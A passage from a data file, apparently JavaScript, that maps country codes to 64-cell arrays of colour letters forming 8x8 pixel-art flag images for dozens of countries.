,G,G,G,R,R,R,G,G,G,G,G,R,G,R,G,G,G,G,G,R,Y,R,G,G,G,G],"AF":[BL,BL,BL,R,R,G,G,G,BL,BL,BL,R,R,G,G,G,BL,BL,BL,W,W,G,G,G,BL,BL,W,W,W,W,G,G,BL,BL,W,W,W,W,G,G,BL,BL,BL,W,W,G,G,G,BL,BL,BL,R,R,G,G,G,BL,BL,BL,R,R,G,G,G,],"KZ":[L,Y,L,L,L,L,L,L,L,Y,L,L,L,L,L,L,L,Y,L,L,Y,Y,L,L,L,Y,L,Y,Y,Y,Y,L,L,Y,L,Y,Y,Y,Y,L,L,Y,L,L,Y,Y,L,L,L,Y,L,L,L,L,L,L,L,Y,L,L,L,L,L,L,],"MN":[R,R,R,B,B,R,R,R,R,Y,R,B,B,R,R,R,R,R,R,B,B,R,R,R,R,Y,R,B,B,R,R,R,R,Y,R,B,B,R,R,R,R,Y,R,B,B,R,R,R,R,Y,R,B,B,R,R,R,R,R,R,B,B,R,R,R,],"CN":[R,R,R,Y,R,R,R,R,R,Y,Y,R,Y,R,R,R,R,Y,Y,R,Y,R,R,R,R,R,R,Y,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"MY":[B,B,Y,B,B,R,R,R,B,Y,B,Y,B,W,W,W,B,Y,B,B,B,R,R,R,B,B,Y,B,B,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,],"PG":[BL,R,R,R,R,R,R,R,BL,BL,R,R,Y,Y,Y,R,BL,W,BL,R,R,Y,Y,R,BL,BL,BL,BL,R,R,R,R,BL,W,W,BL,BL,R,R,R,BL,BL,BL,BL,BL,BL,R,R,BL,BL,W,BL,BL,BL,BL,R,BL,BL,BL,BL,BL,BL,BL,BL,],"AU":[B,B,R,B,B,B,B,B,B,B,R,B,B,B,W,B,R,R,R,R,R,B,B,W,B,B,R,B,B,W,B,B,B,B,R,B,B,B,B,W,B,B,B,B,B,B,W,B,B,B,W,B,B,B,B,B,B,B,B,B,B,B,B,B,],"KR":[W,W,BL,W,W,BL,W,W,W,BL,W,W,W,W,BL,W,BL,W,W,W,W,W,W,BL,W,W,W,R,R,W,W,W,W,W,W,B,B,W,W,W,BL,W,W,W,W,W,W,BL,W,BL,W,W,W,W,BL,W,W,W,BL,W,W,BL,W,W,],"JP":[W,W,W,W,W,W,W,W,W,W,W,R,R,W,W,W,W,W,R,R,R,R,W,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,W,R,R,R,R,W,W,W,W,W,R,R,W,W,W,W,W,W,W,W,W,W,W],"TH":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"ID":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,],"IN":[O,O,O,O,O,O,O,O,O,O,O,O,O,O,O,O,W,W,W,W,W,W,W,W,W,W,W,B,B,W,W,W,W,W,W,B,B,W,W,W,W,W,W,W,W,W,W,W,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"PK":[W,W,DG,DG,DG,DG,DG,DG,W,W,DG,DG,W,DG,DG,DG,W,W,DG,W,DG,DG,W,DG,W,W,DG,W,DG,DG,DG,DG,W,W,DG,W,DG,DG,W,DG,W,W,DG,DG,W,W,DG,DG,W,W,DG,DG,DG,DG,DG,DG,W,W,DG,DG,DG,DG,DG,DG,],"NA":[B,B,B,B,B,W,R,R,B,Y,B,B,W,R,R,W,B,B,B,W,R,R,W,G,B,B,W,R,R,W,G,G,B,W,R,R,W,G,G,G,W,R,R,W,G,G,G,G,R,R,W,G,G,G,G,G,R,W,G,G,G,G,G,G,],"AO":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,R,R,R,R,R,R,R,R,Y,R,R,R,BL,BL,BL,Y,Y,BL,BL,BL,BL,BL,Y,Y,Y,BL,BL,BL,BL,BL,BL,BL,BL,Y,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,],"CD":[B,B,B,B,B,Y,R,R,B,Y,B,B,Y,R,R,Y,B,B,B,Y,R,R,Y,B,B,B,Y,R,R,Y,B,B,B,Y,R,R,Y,B,B,B,Y,R,R,Y,B,B,B,B,R,R,Y,B,B,B,B,B,R,Y,B,B,B,B,B,B,],"SS":[B,BL,BL,BL,BL,BL,BL,BL,B,B,BL,BL,BL,BL,BL,BL,B,B,B,W,W,W,W,W,B,Y,Y,B,R,R,R,R,B,Y,Y,B,R,R,R,R,B,B,B,W,W,W,W,W,B,B,G,G,G,G,G,G,B,G,G,G,G,G,G,G,],"SD":[G,R,R,R,R,R,R,R,G,G,R,R,R,R,R,R,G,G,G,R,R,R,R,R,G,G,G,G,W,W,W,W,G,G,G,G,W,W,W,W,G,G,G,BL,BL,BL,BL,BL,G,G,BL,BL,BL,BL,BL,BL,G,BL,BL,BL,BL,BL,BL,BL,],"GN":[R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,R,R,R,Y,Y,G,G,G,],"ZA":[G,G,W,R,R,R,R,R,Y,G,G,W,R,R,R,R,BL,Y,G,G,W,W,W,W,BL,BL,Y,G,G,G,G,G,BL,BL,Y,G,G,G,G,G,BL,Y,G,G,W,W,W,W,Y,G,G,W,B,B,B,B,G,G,W,B,B,B,B,B,],"ET":[G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,B,B,G,G,G,Y,Y,B,Y,Y,B,Y,Y,Y,Y,B,Y,Y,B,Y,Y,R,R,R,B,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"NG":[G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,],"NL":[O,O,O,O,O,O,O,O,O,O,O,O,O,O,O,O,W,W,W,W,W,W,W,W,W,W,W,O,O,W,W,W,W,W,W,O,O,W,W,W,W,W,W,W,W,W,W,W,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"TD":[B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,],"LY":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,BL,BL,W,W,BL,BL,BL,BL,BL,W,BL,BL,BL,W,W,BL,BL,W,BL,BL,BL,W,W,BL,BL,BL,W,W,BL,BL,BL,BL,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"ML":[G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,G,G,G,Y,Y,R,R,R,],"MR":[R,R,R,R,R,R,R,R,G,G,G,Y,Y,G,G,G,G,G,G,G,G,G,G,G,G,G,Y,G,G,Y,G,G,G,G,Y,G,G,Y,G,G,G,G,G,Y,Y,G,G,G,G,G,G,G,G,G,G,G,R,R,R,R,R,R,R,R,],"DZ":[G,G,G,G,W,W,W,W,G,G,G,G,W,W,W,W,G,G,G,R,R,W,W,W,G,G,R,G,W,W,R,W,G,G,R,G,W,W,R,W,G,G,G,R,R,W,W,W,G,G,G,G,W,W,W,W,G,G,G,G,W,W,W,W,],"EG":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,Y,Y,W,W,W,W,W,W,Y,Y,W,W,W,W,W,W,W,W,W,W,W,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,],"US":[W,B,W,B,W,R,R,R,B,W,B,W,B,W,W,W,W,B,W,B,W,R,R,R,B,W,B,W,B,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,],"CA":[R,W,W,W,W,W,W,R,R,W,W,W,W,W,W,R,R,W,W,R,R,W,W,R,R,W,R,R,R,R,W,R,R,W,W,R,R,W,W,R,R,W,W,R,R,W,W,R,R,W,W,W,W,W,W,R,R,W,W,W,W,W,W,R,],"BR":[G,G,G,Y,Y,G,G,G,G,G,Y,B,B,Y,G,G,G,Y,B,B,B,B,Y,G,Y,B,B,B,B,B,B,Y,Y,B,B,B,B,B,B,Y,G,Y,B,B,B,B,Y,G,G,G,Y,B,B,Y,G,G,G,G,G,Y,Y,G,G,G,],"BO":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"VE":[Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,B,B,W,W,W,W,B,B,B,W,B,B,B,B,W,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"AR":[B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,W,W,W,Y,Y,W,W,W,W,W,W,Y,Y,W,W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,],"UY":[W,Y,W,B,B,B,B,B,Y,Y,Y,W,W,W,W,W,W,Y,W,B,B,B,B,B,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,],"UZ":[L,L,W,L,L,W,L,W,L,W,L,L,W,L,W,L,L,L,W,L,L,L,L,L,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"VN":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,R,R,R,R,R,Y,Y,Y,Y,R,R,R,R,R,Y,Y,R,R,R,R,R,Y,R,R,Y,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"ZM":[DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,O,DG,O,DG,DG,DG,DG,DG,DG,O,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,R,BL,O,DG,DG,DG,DG,DG,R,BL,O,DG,DG,DG,DG,DG,R,BL,O,DG,DG,DG,DG,DG,R,BL,O,],"ZW":[W,G,G,G,G,G,G,G,W,W,Y,Y,Y,Y,Y,Y,W,W,W,R,R,R,R,R,W,Y,W,W,BL,BL,BL,BL,W,Y,W,W,BL,BL,BL,BL,W,W,W,R,R,R,R,R,W,W,Y,Y,Y,Y,Y,Y,W,G,G,G,G,G,G,G,],"CU":[R,B,B,B,B,B,B,B,R,R,W,W,W,W,W,W,R,R,R,W,W,W,W,W,R,W,R,R,B,B,B,B,R,W,R,R,B,B,B,B,R,R,R,W,W,W,W,W,R,R,W,W,W,W,W,W,R,B,B,B,B,B,B,B,],"CZ":[B,W,W,W,W,W,W,W,B,B,W,W,W,W,W,W,B,B,B,W,W,W,W,W,B,B,B,B,W,W,W,W,B,B,B,B,R,R,R,R,B,B,B,R,R,R,R,R,B,B,R,R,R,R,R,R,B,R,R,R,R,R,R,R,],"KP":[B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,R,R,W,W,R,R,R,R,R,W,R,R,W,R,R,R,R,W,R,R,W,R,R,R,R,R,W,W,R,R,R,R,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,],"PT":[G,G,G,R,R,R,R,R,G,G,G,R,R,R,R,R,G,G,Y,Y,R,R,R,R,G,Y,W,W,Y,R,R,R,G,Y,W,W,Y,R,R,R,G,G,Y,Y,R,R,R,R,G,G,G,R,R,R,R,R,G,G,G,R,R,R,R,R,],"PY":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,G,Y,Y,G,W,W,W,W,G,Y,Y,G,W,W,W,W,W,G,G,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,],"RS":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,Y,R,R,R,B,R,O,W,O,R,B,B,B,R,W,W,W,R,B,B,W,W,R,W,R,W,W,W,W,W,W,R,W,W,W,W,W,W,W,W,W,W,W,W,],"SE":[B,B,Y,Y,B,B,B,B,B,B,Y,Y,B,B,B,B,B,B,Y,Y,B,B,B,B,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,B,B,Y,Y,B,B,B,B,B,B,Y,Y,B,B,B,B,B,B,Y,Y,B,B,B,B,],"SL":[G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,],"SN":[DG,DG,Y,Y,Y,Y,R,R,DG,DG,Y,Y,Y,Y,R,R,DG,DG,Y,Y,Y,Y,R,R,DG,DG,Y,DG,DG,Y,R,R,DG,DG,Y,DG,DG,Y,R,R,DG,DG,Y,Y,Y,Y,R,R,DG,DG,Y,Y,Y,Y,R,R,DG,DG,Y,Y,Y,Y,R,R,],"SO":[L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,W,W,L,L,L,L,L,W,W,W,W,L,L,L,L,L,W,W,L,L,L,L,L,W,L,L,W,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,],"SR":[G,G,G,G,G,G,G,G,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,Y,Y,R,R,R,R,R,R,Y,Y,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,G,G,G,G,G,G,G,G,],"SY":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,DG,DG,W,W,DG,DG,W,W,DG,DG,W,W,DG,DG,W,W,W,W,W,W,W,W,W,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,],"MM":[Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,W,W,Y,Y,Y,Y,Y,W,W,W,W,Y,Y,G,G,G,W,W,G,G,G,G,G,G,W,W,G,G,G,R,R,W,R,R,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"NI":[B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,W,W,W,Y,Y,W,W,W,W,W,Y,Y,Y,Y,W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,],"NE":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,],"MX":[DG,DG,W,W,W,W,DG,DG,DG,DG,W,W,W,W,DG,DG,DG,DG,W,BR,W,BR,DG,DG,DG,DG,W,W,BR,W,DG,DG,DG,DG,W,W,BR,BR,DG,DG,DG,DG,W,W,O,W,DG,DG,DG,DG,W,W,W,W,DG,DG,DG,DG,W,W,W,W,DG,DG,],"MZ":[DR,DG,DG,DG,DG,DG,DG,DG,DR,DR,DG,DG,DG,DG,DG,DG,DR,DR,DR,W,W,W,W,W,DR,Y,Y,DR,BL,BL,BL,BL,DR,Y,Y,DR,BL,BL,BL,BL,DR,DR,DR,W,W,W,W,W,DR,DR,DG,DG,DG,DG,DG,DG,DR,DG,DG,DG,DG,DG,DG,DG,],"AD":[B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,GO,GO,R,R,R,B,B,B,GO,GO,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,],"AE":[R,R,G,DG,DG,DG,DG,DG,R,R,DG,DG,DG,DG,DG,DG,R,R,DG,DG,DG,DG,DG,DG,R,R,W,W,W,W,W,W,R,R,W,W,W,W,W,W,R,R,BL,BL,BL,BL,BL,BL,R,R,BL,BL,BL,BL,BL,BL,R,R,BL,BL,BL,BL,BL,BL,],"AL":[R,R,R,R,R,R,R,R,R,R,BL,R,R,BL,R,R,R,BL,R,BL,BL,R,BL,R,R,R,BL,BL,BL,BL,R,R,R,R,R,BL,BL,R,R,R,R,R,BL,BL,BL,BL,R,R,R,R,R,BL,BL,R,R,R,R,R,R,R,R,R,R,R,],"AM":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,GO,],"AZ":[L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,R,R,W,W,R,R,R,R,R,W,R,R,R,W,W,R,R,W,R,R,R,W,W,R,R,R,W,W,R,R,R,R,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"BA":[B,W,GO,GO,GO,GO,GO,B,B,W,GO,GO,GO,GO,GO,B,B,B,W,GO,GO,GO,GO,B,B,B,W,GO,GO,GO,GO,B,B,B,B,W,GO,GO,GO,B,B,B,B,B,W,GO,GO,B,B,B,B,B,W,GO,GO,B,B,B,B,B,B,W,GO,B,],"BD":[DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,R,R,DG,DG,DG,DG,DG,R,R,R,R,DG,DG,DG,R,R,R,R,R,R,DG,DG,R,R,R,R,R,R,DG,DG,DG,R,R,R,R,DG,DG,DG,DG,DG,R,R,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,],"BE":[BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,],"BF":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,R,R,R,G,G,G,Y,Y,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"BG":[W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"BH":[W,W,W,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,R,R,R,R,R,R,],"BI":[W,R,R,R,R,R,R,W,G,W,R,R,R,R,W,G,G,G,W,W,W,W,G,G,G,G,W,R,R,W,G,G,G,G,W,R,R,W,G,G,G,G,W,W,W,W,G,G,G,W,R,R,R,R,W,G,W,R,R,R,R,R,R,W,],"BJ":[DG,DG,DG,Y,Y,Y,Y,Y,DG,DG,DG,Y,Y,Y,Y,Y,DG,DG,DG,Y,Y,Y,Y,Y,DG,DG,DG,Y,Y,Y,Y,Y,DG,DG,DG,R,R,R,R,R,DG,DG,DG,R,R,R,R,R,DG,DG,DG,R,R,R,R,R,DG,DG,DG,R,R,R,R,R,],"BN":[W,W,Y,Y,Y,Y,Y,Y,BL,W,W,Y,Y,Y,Y,Y,BL,BL,W,R,R,Y,Y,Y,Y,BL,R,R,R,R,Y,Y,Y,Y,R,R,R,R,Y,Y,Y,Y,Y,R,R,W,W,Y,Y,Y,Y,Y,BL,BL,W,W,Y,Y,Y,Y,Y,BL,BL,W,],"BW":[L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,W,W,W,W,W,W,W,W,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,W,W,W,W,W,W,W,W,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,],"CF":[DB,DB,DB,R,R,DB,DB,DB,DB,Y,DB,R,R,DB,DB,DB,W,W,W,R,R,W,W,W,W,W,W,R,R,W,W,W,G,G,G,R,R,G,G,G,G,G,G,R,R,G,G,G,Y,Y,Y,R,R,Y,Y,Y,Y,Y,Y,R,R,Y,Y,Y,],"CG":[G,G,G,G,G,G,G,Y,G,G,G,G,G,G,Y,Y,G,G,G,G,G,Y,Y,R,G,G,G,G,Y,Y,R,R,G,G,G,Y,Y,R,R,R,G,G,Y,Y,R,R,R,R,G,Y,Y,R,R,R,R,R,Y,Y,R,R,R,R,R,R,],"CI":[O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,],"CL":[DB,DB,DB,W,W,W,W,W,DB,W,DB,W,W,W,W,W,DB,W,DB,W,W,W,W,W,DB,DB,DB,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"CM":[DG,DG,R,R,R,R,Y,Y,DG,DG,R,R,R,R,Y,Y,DG,DG,R,R,R,R,Y,Y,DG,DG,R,Y,Y,R,Y,Y,DG,DG,R,Y,Y,R,Y,Y,DG,DG,R,R,R,R,Y,Y,DG,DG,R,R,R,R,Y,Y,DG,DG,R,R,R,R,Y,Y,],"CO":[Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"CR":[DB,DB,DB,DB,DB,DB,DB,DB,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,DB,DB,DB,DB,DB,DB,DB,DB,],"DK":[R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,],"DO":[DB,DB,DB,W,W,R,R,R,DB,DB,DB,W,W,R,R,R,DB,DB,DB,W,W,R,R,R,W,W,W,DB,R,W,W,W,W,W,W,R,DB,W,W,W,R,R,R,W,W,DB,DB,DB,R,R,R,W,W,DB,DB,DB,R,R,R,W,W,DB,DB,DB,],"EC":[Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,L,L,Y,Y,Y,DB,DB,DB,G,G,DB,DB,DB,DB,DB,DB,Y,Y,DB,DB,DB,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"PH":[W,DB,DB,DB,DB,DB,DB,DB,Y,W,DB,DB,DB,DB,DB,DB,W,W,W,DB,DB,DB,DB,DB,W,Y,Y,W,DB,DB,DB,DB,W,Y,Y,W,R,R,R,R,W,W,W,R,R,R,R,R,Y,W,R,R,R,R,R,R,W,R,R,R,R,R,R,R,],"UG":[BL,BL,BL,BL,BL,BL,BL,BL,Y,Y,Y,Y,Y,Y,Y,Y,R,R,R,W,W,R,R,R,R,R,W,BL,W,W,R,R,BL,BL,W,BL,BL,W,BL,BL,BL,BL,BL,W,W,BL,BL,BL,Y,Y,Y,Y,Y,Y,Y,Y,R,R,R,R,R,R,R,R,],"TZ":[G,G,G,G,G,G,Y,BL,G,G,G,G,G,Y,BL,BL,G,G,G,G,Y,BL,BL,Y,G,G,G,Y,BL,BL,Y,L,G,G,Y,BL,BL,Y,L,L,G,Y,BL,BL,Y,L,L,L,Y,BL,BL,Y,L,L,L,L,BL,BL,Y,L,L,L,L,L,],"TN":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,R,R,R,R,R,W,R,R,W,R,R,R,R,W,R,R,W,R,R,R,R,R,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"NO":[R,W,DB,DB,W,R,R,R,R,W,DB,DB,W,R,R,R,W,W,DB,DB,W,W,W,W,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,W,W,DB,DB,W,W,W,W,R,W,DB,DB,W,R,R,R,R,W,DB,DB,W,R,R,R,],"ME":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,GO,R,R,GO,R,R,R,R,GO,GO,GO,GO,R,R,R,R,R,GO,GO,R,R,R,R,R,GO,GO,GO,GO,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"OM":[R,R,R,W,W,W,W,W,R,W,R,W,W,W,W,W,R,R,R,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,G,G,G,G,G,R,R,R,G,G,G,G,G,R,R,R,G,G,G,G,G,],"PA":[W,W,W,W,R,R,R,R,W,DB,DB,W,R,R,R,R,W,DB,DB,W,R,R,R,R,W,W,W,W,R,R,R,R,DB,DB,DB,DB,W,W,W,W,DB,DB,DB,DB,W,R,R,W,DB,DB,DB,DB,W,R,R,W,DB,DB,DB,DB,W,W,W,W,],"PE":[R,R,W,W,W,W,R,R,R,R,W,W,W,W,R,R,R,R,W,G,G,W,R,R,R,R,G,W,W,G,R,R,R,R,G,R,R,G,R,R,R,R,W,G,G,W,R,R,R,R,W,W,W,W,R,R,R,R,W,W,W,W,R,R,],"MK":[Y,R,R,Y,Y,R,R,Y,R,Y,R,Y,Y,R,Y,R,R,R,Y,Y,Y,Y,R,R,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,R,R,Y,Y,Y,Y,R,R,R,Y,R,Y,Y,R,Y,R,Y,R,R,Y,Y,R,R,Y,],"MG":[W,W,W,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,W,DG,DG,DG,DG,DG,W,W,W,DG,DG,DG,DG,DG,W,W,W,DG,DG,DG,DG,DG,W,W,W,DG,DG,DG,DG,DG,],"EE":[L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W],"FI":[W,W,B,B,W,W,W,W,W,W,B,B,W,W,W,W,W,W,B,B,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,W,W,B,B,W,W,W,W,W,W,B,B,W,W,W,W,W,W,B,B,W,W,W,W],"GA":[G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L],"GE":[W,W,W,R,R,W,W,W,W,R,W,R,R,W,R,W,W,W,W,R,R,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,R,R,W,W,W,W,R,W,R,R,W,R,W,W,W,W,R,R,W,W,W],"GH":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,Y,BL,BL,Y,Y,Y,Y,Y,BL,BL,BL,BL,Y,Y,Y,Y,Y,BL,BL,Y,Y,Y,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G],"GT":[L,L,W,W,W,L,L,L,L,L,W,W,W,L,L,L,L,L,W,DG,W,L,L,L,L,L,DG,Y,DG,L,L,L,L,L,W,DG,W,L,L,L,L,L,W,W,W,L,L,L,L,L,W,W,W,L,L,L,L,L,W,W,W,L,L,L],"GY":[W,W,W,W,W,W,G,G,BL,Y,Y,Y,Y,Y,W,G,R,BL,BL,Y,Y,Y,W,G,R,R,R,BL,Y,Y,Y,W,R,R,R,BL,Y,Y,Y,W,R,BL,BL,